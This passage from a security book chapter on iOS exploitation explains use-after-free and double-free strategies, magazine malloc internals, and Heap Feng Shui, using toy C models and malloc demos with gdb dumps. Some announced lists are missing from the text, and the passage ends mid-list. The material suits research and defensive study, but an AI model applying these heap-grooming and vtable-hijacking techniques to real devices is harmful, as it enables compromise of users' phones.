Chapter 7
Exploitation
The attack surface on iOS is similar to the one available on Mac OS X. Therefore, as far as userland exploitation is concerned, your focus should be tailored to client-side heap exploitation.
This chapter starts by covering the common bug classes present in most client-side applications, and then digs into the notions you need to write a successful attack against them.
In modern application exploitation, it is vital to fully understand how the allocator used by the application works and how to control it as precisely as possible. In this chapter you learn about the iOS system allocator and the techniques you can use to control its layout.
One of the most frequently hit targets is the web browser. MobileSafari uses TCMalloc instead of the system allocator, so this chapter also dissects how it works and how to leverage its internals to improve an exploit's reliability.
Finally, an example of a client-side exploit, the Pwn2Own 2010 MobileSafari exploit, is analyzed to demonstrate how the techniques described in this chapter are applied in real life.
Depending on the targeted software, the types of vulnerabilities present in it vary wildly. For instance, when it comes to browsers it is very likely that the bug classes you will be dealing with are object lifetime issues, including use-after-free and double-free bugs, among others. If, instead, the target is a binary format parser (such as a PDF reader), the bug classes are most likely arithmetic issues or overflows.
This section briefly describes the strategies applied most frequently to exploit bugs belonging to the bug classes discussed earlier, so that you will be able to grasp which details of the allocator's behavior are relevant for each bug class.
Object lifetime issues, such as use-after-free and double-free bugs, are often present in software when an attacker has a lot of control (for example, through JavaScript) of the behavior of the application.
Use-after-free bugs usually exist when an object is deallocated but then used again in a code path. Such bugs tend to be present when the management of an object life span is far from obvious, which is one of the reasons why browsers are the perfect playground for them. Figure 7.1 shows the characteristics of these types of bugs.
In general, the strategy for exploiting these vulnerabilities is pretty straightforward:
Often the easiest way for an attacker to execute code is to replace the virtual table pointer of the object with an address under his control; this way, whenever an indirect call is made, the execution can be hijacked.
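The idea can be illustrated with a deliberately simplified C model. This is only a sketch: the function-pointer table stands in for a C++ virtual table, the one-slot allocator (toy_alloc and toy_free) is hypothetical and exists only to make the reuse deterministic, and every name in it is invented for illustration.

```c
#include <assert.h>

/* Hypothetical stand-ins for a C++ object and its virtual table. */
typedef int (*method_fn)(void);
struct vtable { method_fn handler; };
struct object { const struct vtable *vt; int payload; };

static int legit_handler(void)    { return 1; }  /* intended behaviour */
static int attacker_handler(void) { return 2; }  /* attacker-chosen target */

static const struct vtable legit_vtable    = { legit_handler };
static const struct vtable attacker_vtable = { attacker_handler };

/* Toy allocator with a single slot, so a freed object is always reused. */
static struct object slot;
static int slot_in_use;

static struct object *toy_alloc(void)
{
    assert(!slot_in_use);
    slot_in_use = 1;
    return &slot;
}

static void toy_free(struct object *o)
{
    assert(o == &slot && slot_in_use);
    slot_in_use = 0;
}

/* Returns the value produced by the call made through the stale pointer. */
static int simulate_use_after_free(void)
{
    struct object *victim = toy_alloc();
    victim->vt = &legit_vtable;
    toy_free(victim);                          /* object dies, pointer survives */

    struct object *replacement = toy_alloc();  /* lands on the same storage */
    replacement->vt = &attacker_vtable;        /* attacker-controlled content */

    return victim->vt->handler();              /* stale use: the call is hijacked */
}
```

In this model simulate_use_after_free() returns 2, the value of the attacker-chosen handler, because the stale pointer and the replacement object share the same storage. A real target differs in that the attacker must first persuade the allocator to hand back the freed block, which is the subject of the rest of this chapter.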
Double-frees are vulnerabilities that happen when an object is deallocated more than once during its life span. The exploitation of double-free can come in different shapes and flavors, but most of the time it can be considered a subcase of a use-after-free bug. The first strategy for turning a double-free into a use-after-free is the following:
The newly created object is freed again as part of the double-free vulnerability.
The second strategy is to inspect all the code paths taken when the vulnerable object is freed, and determine whether it is possible to hijack the execution by controlling its content with specifically crafted data. For instance, if an indirect call (either of the object itself or of a member of the object) is triggered in the object destructor, an attacker can take over the application in pretty much the same fashion used for use-after-free bugs.
It should be clear by now that you have a lot of allocation-deallocation gimmicks to learn in order to exploit these vulnerabilities. In fact, the focus with these kinds of vulnerabilities is more on the functioning of an allocator than possible weaknesses in handling memory blocks.
In the next section you see some bug classes that require more focus on the latter than the former.
Arithmetic and Overflow Vulnerabilities
These vulnerabilities usually allow an attacker to overwrite four or more bytes at more or less arbitrary locations. Whether an integer overflow occurs and allows an attacker to write past the size of a buffer, or allows the attacker to allocate a smaller-than-needed buffer, or the attacker ends up having the chance to write to a buffer that is smaller than intended, what she needs is a reliable way to control the heap layout to be able to overwrite interesting data.
Especially in the past, the strategy was usually to overwrite heap metadata so that when an element of a linked list was unlinked, an attacker could overwrite an arbitrary memory location. Nowadays, it is more common to overwrite application-specific data, because the heap normally checks the consistency of its data structures. Overwriting application-specific data often requires making sure that the buffer you are overflowing sits close to the one that needs to be overwritten. Later in this chapter you learn to perform all those operations with some simple techniques that can work in most scenarios.
The iOS system allocator is called magazine malloc. To study the allocator implementation, refer to the Mac OS X allocator (whose implementation is located in magazine_malloc.c in the Libc source code for Mac OS X).
Although some research has been done on the previous version of the Mac OS X allocator, there is a general lack of information on magazine malloc exploitation. The best available research on the topic was covered by Dino Dai Zovi and Charlie Miller in The Mac Hacker's Handbook (Wiley Publishing: 978-0-470-39536-3) and in a few other white papers.
This section covers the notions you need to create an exploit for the iOS allocator.
Magazine malloc uses the concept of regions to perform allocations. Specifically, the heap is divided into three regions:
Each region consists of an array of memory blocks (known as quanta) and metadata to determine which quanta are used and which ones are free. Each region differs slightly from the others based on two factors — region and quantum size:
The allocator maintains 32 freelists for tiny and small regions. The freelists from 1 to 31 are used for allocations, and the last freelist is used for blocks that are coalesced after two or more objects close to each other are freed.
The main difference between magazine malloc and the previous allocator on iOS is that magazine malloc maintains separate regions for each CPU present on the system. This allows the allocator to scale much better than the previous one. This chapter does not take this difference into account because only the new iPhone 4S and iPad 2 are dual-core; the other Apple products running iOS have only one CPU.
When an allocation is required, magazine malloc first decides which region is the appropriate one based on the requested size. The behavior for tiny and small regions is identical, whereas for large allocations the process is slightly different. This section walks through the process for tiny and large regions, which gives a complete overview of how the allocation process works.
Every time a memory block is deallocated, magazine malloc keeps a reference to it in a dedicated structure member called mag_last_free. If a new allocation requests the same size as the block held in mag_last_free, that block is returned to the caller and mag_last_free is set to NULL.
If the size differs, magazine malloc starts looking in the freelists for the specific region for an exact size match. If this attempt is unsuccessful, the last freelist is examined; this freelist, as mentioned before, is used to store larger memory blocks that were coalesced.
If the last freelist is not empty, a memory block from there is split into two parts: one to be returned to the caller and one to be put back on the freelist itself.
If all the preceding attempts failed and no suitable memory regions are allocated, magazine malloc allocates a new memory block using mmap() and assigns it to the appropriate region type. This process is carried out by the thread whose request for allocation could not be satisfied.
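The order of these lookups can be summarized in a small model. The sketch below tracks only block sizes in quanta, not real memory; the structure tiny_model, the function model_alloc, and the single-entry representation of the last freelist are simplifications invented for illustration and do not mirror the data structures in magazine_malloc.c.

```c
#include <assert.h>

#define NUM_SLOTS 32                 /* freelists per region, as described above */
#define LAST_SLOT (NUM_SLOTS - 1)

enum source {
    FROM_LAST_FREE,            /* served from mag_last_free */
    FROM_EXACT_FREELIST,       /* exact size match on a freelist */
    FROM_LAST_FREELIST_SPLIT,  /* carved out of a coalesced block */
    FROM_NEW_REGION            /* nothing suitable: a new mapping is needed */
};

struct tiny_model {
    unsigned last_free_quanta;        /* size held in mag_last_free, 0 if empty */
    unsigned exact_count[LAST_SLOT];  /* exact_count[q - 1]: free blocks of q quanta */
    unsigned big_block_quanta;        /* one coalesced block on the last freelist, 0 if none */
};

static enum source model_alloc(struct tiny_model *m, unsigned quanta)
{
    assert(quanta >= 1 && quanta <= LAST_SLOT);

    if (m->last_free_quanta == quanta) {      /* step 1: most recently freed block */
        m->last_free_quanta = 0;
        return FROM_LAST_FREE;
    }
    if (m->exact_count[quanta - 1] > 0) {     /* step 2: exact size match */
        m->exact_count[quanta - 1]--;
        return FROM_EXACT_FREELIST;
    }
    if (m->big_block_quanta >= quanta) {      /* step 3: split a coalesced block */
        m->big_block_quanta -= quanta;        /* remainder goes back on the list */
        return FROM_LAST_FREELIST_SPLIT;
    }
    return FROM_NEW_REGION;                   /* step 4: fall back to mmap() */
}
```

For example, with a 2-quantum block in mag_last_free, a request for 2 quanta is served from the cache, while a request for 3 quanta falls through to the freelists. This ordering is what makes "free an object, then immediately allocate one of the same size" such a dependable primitive.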
For large objects the process is more straightforward. Instead of maintaining 32 freelists, large objects have a cache that contains all the available entries. Therefore, the allocator first looks for already allocated memory pages of the correct size. If none can be found, it searches for bigger memory blocks and splits them so that one half can fulfill the request and the other is pushed back to the list of available ones.
Finally, if no memory regions are available, an allocation using mmap() is performed.
The same distinction made for allocations in terms of regions holds true for deallocations as well. As a result, deallocation is covered only for tiny memory objects and large memory objects.
When a tiny object is freed, the allocator puts it in the region cache, that is, mag_last_free.
The memory area that was previously there is moved to the appropriate free-list following three steps. First the allocator checks whether the object can be coalesced with the previous one, then it verifies if it can be coalesced with the following one. Depending on whether any of the coalescing operations were successful, the object is placed accordingly.
If the size of the object after coalescing it is bigger than the appropriate sizes for the tiny region, the object is placed in the last freelist (recalling from the Allocation section, this is the region where objects bigger than expected for a given region are placed).
When a tiny region contains only freed blocks, the whole region is released to the system.
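The interplay between the mag_last_free cache and coalescing is easier to follow in a toy model. The sketch below represents a region as a list of blocks in address order; the types, the function names, and the use of offsets in quanta instead of real addresses are all assumptions made for illustration. It also ignores the last-freelist and region-release rules.

```c
#include <assert.h>

#define MAX_BLOCKS 16

enum state { IN_USE, CACHED, ON_FREELIST };
struct block  { int start; int quanta; enum state st; };  /* start: offset in quanta */
struct region { struct block b[MAX_BLOCKS]; int n; int cached_start; };

static void region_init(struct region *r, const int *quanta, int n)
{
    int start = 0;
    assert(n <= MAX_BLOCKS);
    r->n = n;
    r->cached_start = -1;                     /* mag_last_free starts empty */
    for (int i = 0; i < n; i++) {
        r->b[i].start = start;
        r->b[i].quanta = quanta[i];
        r->b[i].st = IN_USE;
        start += quanta[i];
    }
}

static int find_block(const struct region *r, int start)
{
    for (int i = 0; i < r->n; i++)
        if (r->b[i].start == start)
            return i;
    return -1;
}

static void remove_block(struct region *r, int idx)
{
    for (int i = idx; i < r->n - 1; i++)
        r->b[i] = r->b[i + 1];
    r->n--;
}

/* Put block idx on a freelist, merging it with free neighbours. */
static void move_to_freelist(struct region *r, int idx)
{
    r->b[idx].st = ON_FREELIST;
    if (idx > 0 && r->b[idx - 1].st == ON_FREELIST) {        /* previous block */
        r->b[idx - 1].quanta += r->b[idx].quanta;
        remove_block(r, idx);
        idx--;
    }
    if (idx + 1 < r->n && r->b[idx + 1].st == ON_FREELIST) { /* following block */
        r->b[idx].quanta += r->b[idx + 1].quanta;
        remove_block(r, idx + 1);
    }
}

/* free(): the new block enters the cache, the old cache entry is released. */
static void model_free(struct region *r, int start)
{
    int idx = find_block(r, start);
    assert(idx >= 0 && r->b[idx].st == IN_USE);
    if (r->cached_start >= 0)
        move_to_freelist(r, find_block(r, r->cached_start));
    idx = find_block(r, start);               /* indices may have shifted */
    r->b[idx].st = CACHED;
    r->cached_start = start;
}
```

With four adjacent 2-quantum blocks freed in the order first, third, second, fourth, the model ends with a single 6-quantum free block starting at offset 0 and the fourth block sitting in the cache. The important detail is that a block is only coalesced when it leaves the cache, one free() later than might be expected.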
The procedure is slightly different for large objects. If the object is larger than a certain threshold, the object is released immediately to the system. Otherwise, in a similar fashion to tiny and small, the object is placed in a dedicated position called large_entry_cache_newest.
The object that was in the most recent position is moved to the large object cache if there is enough space — that is, if the number of entries in the cache doesn't exceed the maximum number of elements allowed to be placed there. The size of the cache is architecture- and OS-dependent.
If the cache exceeds the size, the object is deallocated without being placed in the cache. Likewise, if after placing the object in the cache, the cache size grows too big, the oldest object in the cache is deleted.
In this section you walk through a number of examples that allow you to better understand the internals of the allocator and how to use it for your own purposes in the context of exploitation.
Most often you will work directly on the device. The main reason for this choice is that magazine malloc keeps per-CPU caches of tiny and small regions; therefore, the behavior on an Intel machine might be too imprecise compared to the iPhone. Nonetheless, when debugging real-world exploits it might be desirable to work from a virtual machine running Mac OS X, which is as close as possible to an iPhone in terms of available RAM and number of CPUs. Another viable and easier option is to use a jailbroken phone; this grants access to gdb and a number of other tools.
A number of tools exist to assist in debugging heap-related issues on Mac OS X; unfortunately, only a small percentage of those are available on non-jailbroken iPhones.
This section talks about all the available tools both on OS X and iOS, specifying which ones are available on both platforms and which are available only on OS X.
A number of environment variables exist to ease the task of debugging. The most important ones are listed here:
These environment variables can be used both on Mac OS X and iOS.
Another tool useful for determining the types of bugs you are dealing with is crashwrangler. When an application crashes, it reports the reason for the crash and whether or not the crash appears to be exploitable. In general, crashwrangler is not really good at predicting exploitability, but nonetheless understanding why the application crashed can be pretty useful.
Finally, you can use Dtrace to inspect allocations and deallocations of memory blocks on the system allocator. The Mac Hacker's Handbook shows a number of Dtrace scripts that can be handy for debugging purposes.
Both Dtrace and crashwrangler are available only for Mac OS X.
One of the easiest ways to exploit an arithmetic bug in the past was to overwrite heap-metadata information. This is not possible anymore with magazine malloc. Every time an object is deallocated, its integrity is verified by the following function:
static INLINE void *
free_list_unchecksum_ptr(szone_t *szone, ptr_union *ptr)
{
    ptr_union p;
    uintptr_t t = ptr->u;

    t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
    p.u = t & ~(uintptr_t)0xF;

    if ((t & (uintptr_t)0xF) != free_list_gen_checksum(p.u ^ szone->cookie))
    {
        free_list_checksum_botch(szone, (free_list_t *)ptr);
        return NULL;
    }
    return p.p;
}
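Specifically, when an object is deallocated, the previous and next pointers stored in its heap metadata are verified. Each pointer is XORed with a randomly generated cookie, a checksum is computed from the result, and that checksum is kept in the high four bits of the stored pointer. If the recomputed checksum does not match the stored one, free_list_checksum_botch is called and the function returns NULL.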
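To make the encoding concrete, here is a small 32-bit model of both directions. It is a sketch under stated assumptions: the body of model_gen_checksum (a byte-wise sum truncated to four bits) is an assumption about what free_list_gen_checksum does and is not taken from the listing above, the model_ names are invented, and uint32_t is used so that the model matches 32-bit ARM pointers regardless of the host.

```c
#include <assert.h>
#include <stdint.h>

#define NYBBLE 4
#define ANTI_NYBBLE (32 - NYBBLE)   /* modelling 32-bit pointers */

/* ASSUMPTION: checksum = sum of the four bytes, truncated to 4 bits. */
static uint32_t model_gen_checksum(uint32_t v)
{
    uint32_t sum = (v & 0xFFu) + ((v >> 8) & 0xFFu) +
                   ((v >> 16) & 0xFFu) + (v >> 24);
    return sum & 0xFu;
}

/* Encode: drop the four zero alignment bits, put the checksum on top. */
static uint32_t model_checksum_ptr(uint32_t ptr, uint32_t cookie)
{
    assert((ptr & 0xFu) == 0);       /* free blocks are 16-byte aligned */
    return (ptr >> NYBBLE) |
           (model_gen_checksum(ptr ^ cookie) << ANTI_NYBBLE);
}

/* Decode, mirroring free_list_unchecksum_ptr; returns 0 on a mismatch. */
static int model_unchecksum_ptr(uint32_t stored, uint32_t cookie, uint32_t *out)
{
    uint32_t t = (uint32_t)(stored << NYBBLE) | (stored >> ANTI_NYBBLE);
    uint32_t ptr = t & ~(uint32_t)0xF;

    if ((t & 0xFu) != model_gen_checksum(ptr ^ cookie))
        return 0;                    /* the real code calls the botch handler */
    *out = ptr;
    return 1;
}
```

In this model a pointer such as 0x0014fa90 is stored as 0x?0014fa9, where the top nibble depends on the cookie. Replacing the low 28 bits with a different address while keeping the old nibble fails the check whenever the byte sum changes, so a blind overwrite is unreliable without knowledge of the cookie.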
Metadata of objects allocated in the large region are not verified. Nonetheless the metadata for those objects are stored separately, and therefore classic attacks against large objects are not feasible either.
Unless an attacker is capable of reading the cookie that is used to verify heap metadata, the only option left is to overwrite application-specific data. For this reason you should try to become familiar with common operations that can be used during exploitation.
It is clear that the ability of an attacker to place memory objects close to each other in memory is pretty important to reliably overwrite application-specific data.
To understand better how to control the heap layout, start with a simple example that illustrates the way objects are allocated and freed. Run this small application on a test device running iOS:
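#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   /* assumed header name for the bookAppDelegate class */
#include <stdlib.h>
#include <string.h>

/* Raise SIGINT in the current process so the attached debugger stops here:
   syscall 20 is getpid, syscall 37 is kill, and signal 2 is SIGINT. */
#define DebugBreak() \
    do { \
        __asm__("mov r0, #20\nmov ip, r0\nsvc 128\n" \
                "mov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
                : : : "memory", "ip", "r0", "r1", "r2"); \
    } while (0)

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;

    /* Four requests of 24 bytes, all served from the tiny region. */
    ptr1 = malloc(24);
    ptr2 = malloc(24);
    ptr3 = malloc(24);
    ptr4 = malloc(24);

    /* Tag the first three buffers so they are easy to spot in a dump. */
    memset(ptr1, 0xaa, 24);
    memset(ptr2, 0xbb, 24);
    memset(ptr3, 0xcc, 24);
    DebugBreak();

    free(ptr1);
    DebugBreak();
    free(ptr3);
    DebugBreak();
    free(ptr2);
    DebugBreak();
    free(ptr4);
    DebugBreak();

    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil,
            NSStringFromClass([bookAppDelegate class]));
    }
}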
The application first allocates four buffers in the tiny region and then starts to free them one by one. We use a macro to cause a software breakpoint so that Xcode will automatically break into gdb for us while running the application on the test device.
At the first breakpoint the buffers have been allocated and placed in memory:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-40
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language: auto; currently objective-c
(gdb) x/40x ptr1
0x14fa50: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000
0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000
0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273
0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265
(gdb) c
Continuing.
Next the first object is freed:
Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        free(ptr3);
(gdb) x/40x ptr1
0x14fa50: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000
0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000
0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273
0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265
(gdb) c
Continuing.
Nothing in memory layout has changed, and this is in line with what we have explained before. In fact, at this point only ptr1 was freed and it was placed accordingly in the mag_last_free cache. Going further:
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:36
36        free(ptr2);
(gdb) x/40x ptr1
0x14fa50: 0x90000000 0x90000000 0xaaaa0002 0xaaaaaaaa
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000
0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000
0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273
0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265
(gdb) c
Continuing.
Now ptr3 was freed as well; therefore, ptr1 had to be taken off the mag_last_free cache and was actually placed on the freelist. The first two dwords represent the previous and the next pointer in the freelist. Remembering that pointers are XORed with a randomly generated cookie, you can easily gather that both of them are NULL; in fact, the freelist was previously empty. The next object to be freed is ptr2:
Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:38
38        free(ptr4);
(gdb) x/40x ptr1
0x14fa50: 0x70014fa9 0x90000000 0xaaaa0002 0xaaaaaaaa
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000
0x14fa90: 0x90000000 0x70014fa5 0xcccc0002 0xcccccccc
0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00020000
0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273
0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265
(gdb) c
Continuing.
Things have changed slightly. Now ptr2 is in the mag_last_free cache and both ptr1 and ptr3 are on the freelist. Moreover, the previous pointer for ptr1 now points to ptr3, whereas the next pointer for ptr3 points to ptr1. Finally, see what happens when ptr4 is placed in the mag_last_free cache:
Program received signal SIGINT, Interrupt.
0x00002400 in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:39
39        DebugBreak();
(gdb) x/40x ptr1
0x14fa50: 0x90000000 0x90000000 0xaaaa0006 0xaaaaaaaa
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000
0x14fa90: 0x90000000 0x90000000 0xcccc0002 0xcccccccc
0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00060000
0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273
0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265
(gdb)
The content of ptr2 seems unchanged, but other things are different. First, both the previous and next pointers for ptr1 and ptr3 are set to NULL, and the size of the ptr1 block has changed. ptr1 is now 96 bytes long (0x0006 * 16 bytes, 16 bytes being the quantum size for the tiny region). This means that ptr1, ptr2, and ptr3 were all coalesced into one block that was placed on the freelist for a different size (0x0006 quanta), which has no other elements. Therefore, both the previous and the next pointers are NULL. The freelist for 0x0002 is now empty.
The previous example dispelled once and for all the idea of overwriting heap metadata to achieve code execution. Therefore, the only available option is to allocate objects in a way that places the vulnerable object next to the one to be overwritten. This technique is called Heap Feng Shui. Later in this chapter, you learn its basics and use it in the context of a browser. For now, you will limit yourself to a simple plan:
To accomplish this goal you can use the following simple application. It first allocates 50 objects and sets their content to 0xcc. Then half of them will be freed, and finally 10 objects filled with 0xaa will be allocated:
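#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   /* assumed header name for the bookAppDelegate class */
#include <stdlib.h>
#include <string.h>

/* Raise SIGINT in the current process so the attached debugger stops here:
   syscall 20 is getpid, syscall 37 is kill, and signal 2 is SIGINT. */
#define DebugBreak() \
    do { \
        __asm__("mov r0, #20\nmov ip, r0\nsvc 128\n" \
                "mov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
                : : : "memory", "ip", "r0", "r1", "r2"); \
    } while (0)

int main(int argc, char *argv[])
{
    unsigned long *buggy[50];
    unsigned long *interesting[10];
    int i;

    /* Fill the heap with 50 same-sized objects tagged 0xcc. */
    for (i = 0; i < 50; i++) {
        buggy[i] = malloc(48);
        memset(buggy[i], 0xcc, 48);
    }
    DebugBreak();

    /* Free every other object (indices 49, 47, ..., 1) to create holes. */
    for (i = 49; i > 0; i -= 2)
        free(buggy[i]);
    DebugBreak();

    /* Allocate 10 objects tagged 0xaa; they should land in the holes. */
    for (i = 0; i < 10; i++) {
        interesting[i] = malloc(48);
        memset(interesting[i], 0xaa, 48);
    }
    DebugBreak();

    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil,
            NSStringFromClass([bookAppDelegate class]));
    }
}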
You start by running the application:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-73
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language: auto; currently objective-c
(gdb) x/50x buggy
0x2fdffacc: 0x0017ca50 0x0017ca80 0x0017cab0 0x0017cae0
0x2fdffadc: 0x0017cb10 0x0017cb40 0x0017cb70 0x0017cba0
0x2fdffaec: 0x0017cbd0 0x0017cc00 0x0017cc30 0x0017cc60
0x2fdffafc: 0x0017cc90 0x0017ccc0 0x0017ccf0 0x0017cd20
0x2fdffb0c: 0x0017cd50 0x0017cd80 0x0017cdb0 0x0017cde0
0x2fdffb1c: 0x0017ce10 0x0017ce40 0x0017ce70 0x0017cea0
0x2fdffb2c: 0x0017ced0 0x0017cf00 0x0017cf30 0x0017cf60
0x2fdffb3c: 0x0017cf90 0x0017cfc0 0x0017cff0 0x0017d020
0x2fdffb4c: 0x0017d050 0x0017d080 0x0017d0b0 0x0017d0e0
0x2fdffb5c: 0x0017d110 0x0017d140 0x0017d170 0x0017d1a0
0x2fdffb6c: 0x0017d1d0 0x0017d200 0x0017d230 0x0017d260
0x2fdffb7c: 0x0017d290 0x0017d2c0 0x0017d2f0 0x0017d320
0x2fdffb8c: 0x0017d350 0x0017d380
(gdb) x/15x 0x0017ca80
0x17ca80: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x17ca90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x17caa0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x17cab0: 0xcccccccc 0xcccccccc 0xcccccccc
(gdb) c
Continuing.
All of the 50 objects were allocated, and each one of them is filled with 0xcc, as expected. Going on further you can see the status of the application after 25 objects are freed:
Program received signal SIGINT, Interrupt.
0x0000235a in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/15x 0x0017cae0
0x17cae0: 0xa0000000 0xe0017cb4 0xcccc0003 0xcccccccc
0x17caf0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x17cb00: 0xcccccccc 0xcccccccc 0xcccccccc 0x0003cccc
0x17cb10: 0xcccccccc 0xcccccccc 0xcccccccc
(gdb) c
Continuing.
The fourth object in buggy is one of those that were freed; specifically, it is the last one added to the freelist (the last object freed, buggy[1], is held in the mag_last_free cache instead). Its previous pointer is set to NULL and its next pointer refers to the sixth object in the buggy array. Finally, you allocate the objects you are interested in:
Program received signal SIGINT, Interrupt.
0x000023fe in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:41
41        DebugBreak();
(gdb) x/10x interesting
0x2fdffaa4: 0x0017ca80 0x0017cae0 0x0017cb40 0x0017cba0
0x2fdffab4: 0x0017cc00 0x0017cc60 0x0017ccc0 0x0017cd20
0x2fdffac4: 0x0017cd80 0x0017cde0
(gdb) x/15x 0x0017ca80
0x17ca80: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x17ca90: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x17caa0: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x17cab0: 0xcccccccc 0xcccccccc 0xcccccccc
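All 10 replacement objects occupy blocks that were previously freed, and their content is filled with 0xaa as expected. The output shows the content of the first replacement object, which sits at 0x0017ca80, the address previously used by the second element of buggy, whose content you have seen before.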
In a real-life application, the same technique can be applied, although some difficulties arise. Specifically, the heap state at the beginning of the exploit will be unknown and far from “ideal,” and the attacker might not have enough room to allocate as many objects as she wishes. Nonetheless, often this technique proves to be pretty useful and applicable. Later in this chapter when describing TCMalloc, you learn how to apply it to MobileSafari.
When dealing with object lifetime issues it is very important to be able to replace the vulnerable object in memory. This can become tricky when memory blocks are coalesced; in fact, in that case, the object size can change in more or less unpredictable ways. In general, you have three ways to overcome this problem:
